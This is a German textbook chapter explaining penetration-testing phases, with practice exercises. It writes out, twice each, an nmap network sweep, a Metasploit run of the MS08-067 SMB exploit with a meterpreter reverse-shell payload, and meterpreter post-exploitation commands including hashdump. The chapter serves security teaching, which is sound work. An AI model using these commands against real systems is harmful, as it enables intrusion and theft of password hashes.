36 Überprüfung der Sicherheit durch Angriffsversuche

36.1 Was sind Angriffsversuche?

Angriffsversuche, auch als Penetrationstests oder Pentests bekannt, sind simulierte Angriffe auf ein Computersystem oder Netzwerk, um Schwachstellen zu identifizieren und zu beheben. Diese Tests helfen, die Sicherheitsmaßnahmen zu überprüfen und sicherzustellen, dass das System gegen tatsächliche Angriffe geschützt ist.

36.2 Vorgehensweise bei Angriffsversuchen

36.2.1 1. Informationssammlung

Der erste Schritt bei einem Penetrationstest ist das Sammeln von Informationen über das Zielsystem. Dazu gehören öffentliche Informationen, Netzwerk-Scans und das Identifizieren von Diensten und Anwendungen, die auf dem System laufen.

36.2.1.1 Beispiel:

• Netzwerk-Scan mit Nmap:

  nmap -sP 192.168.1.0/24

36.2.2 2. Schwachstellenanalyse

Nach der Informationssammlung wird das System auf bekannte Schwachstellen untersucht. Dies kann mithilfe von Tools oder durch manuelle Überprüfung geschehen.

36.2.2.1 Beispiel:

• Verwendung von Nessus für Schwachstellen-Scans:
  • Nessus ist ein beliebtes Tool für Schwachstellen-Scans.
  • Installieren und konfigurieren Sie Nessus, um Ihr Netzwerk und Ihre Systeme zu scannen.

36.2.3 3. Exploitation

In diesem Schritt werden die identifizierten Schwachstellen ausgenutzt, um zu prüfen, ob sie tatsächlich angreifbar sind. Dieser Schritt erfordert besondere Vorsicht, um das Zielsystem nicht zu beschädigen.

36.2.3.1 Beispiel:

• Verwendung von Metasploit für Exploits:

  • Metasploit ist ein weit verbreitetes Exploit-Framework.

  • Beispiel für die Verwendung eines Exploits:

    msfconsole
    use exploit/windows/smb/ms08_067_netapi
    set RHOST <Ziel-IP>
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST <Ihre-IP>
    exploit

36.2.4 4. Post-Exploitation

Nach erfolgreicher Ausnutzung einer Schwachstelle wird die Umgebung weiter analysiert, um den Umfang des Angriffs zu bestimmen und zusätzliche Informationen zu sammeln.

36.2.4.1 Beispiel:

• Verwendung von Meterpreter für Post-Exploitation:

  • Nach erfolgreichem Exploit können Sie Meterpreter nutzen, um weitergehende Befehle auszuführen:

    meterpreter > sysinfo
    meterpreter > getuid
    meterpreter > hashdump

36.2.5 5. Berichterstellung und Gegenmaßnahmen

Der letzte Schritt besteht darin, einen Bericht über die durchgeführten Tests und die gefundenen Schwachstellen zu erstellen. Der Bericht sollte Empfehlungen zur Behebung der Schwachstellen enthalten.

36.2.5.1 Beispiel:

• Erstellung eines Berichts:
  • Zusammenfassung der durchgeführten Tests und ihrer Ergebnisse.
  • Detaillierte Beschreibung der identifizierten Schwachstellen.
  • Empfehlungen zur Behebung der Schwachstellen.

36.3 Praktische Übungen zur Überprüfung der Sicherheit

36.3.1 Übung 1: Netzwerk-Scanning

• Verwenden Sie Nmap, um das Netzwerk zu scannen und die aktiven Geräte und offenen Ports zu identifizieren.

  nmap -sP 192.168.1.0/24

36.3.2 Übung 2: Schwachstellen-Scan

• Installieren und konfigurieren Sie Nessus, um Ihr Netzwerk und Ihre Systeme auf bekannte Schwachstellen zu scannen.
  • Folgen Sie den Anweisungen auf der Nessus-Website zur Installation und Einrichtung.

36.3.3 Übung 3: Exploitation mit Metasploit

• Verwenden Sie Metasploit, um eine identifizierte Schwachstelle auszunutzen.

  msfconsole
  use exploit/windows/smb/ms08_067_netapi
  set RHOST <Ziel-IP>
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST <Ihre-IP>
  exploit

36.3.4 Übung 4: Post-Exploitation

• Verwenden Sie Meterpreter, um nach erfolgreichem Exploit weitergehende Befehle auszuführen.

  meterpreter > sysinfo
  meterpreter > getuid
  meterpreter > hashdump

36.3.5 Übung 5: Berichterstellung

• Erstellen Sie einen Bericht über die durchgeführten Tests, die gefundenen Schwachstellen und die empfohlenen Gegenmaßnahmen.

Durch diese praktischen Übungen und das Verständnis der einzelnen Schritte eines Penetrationstests können Sie die Sicherheit Ihres Systems effektiv überprüfen und verbessern.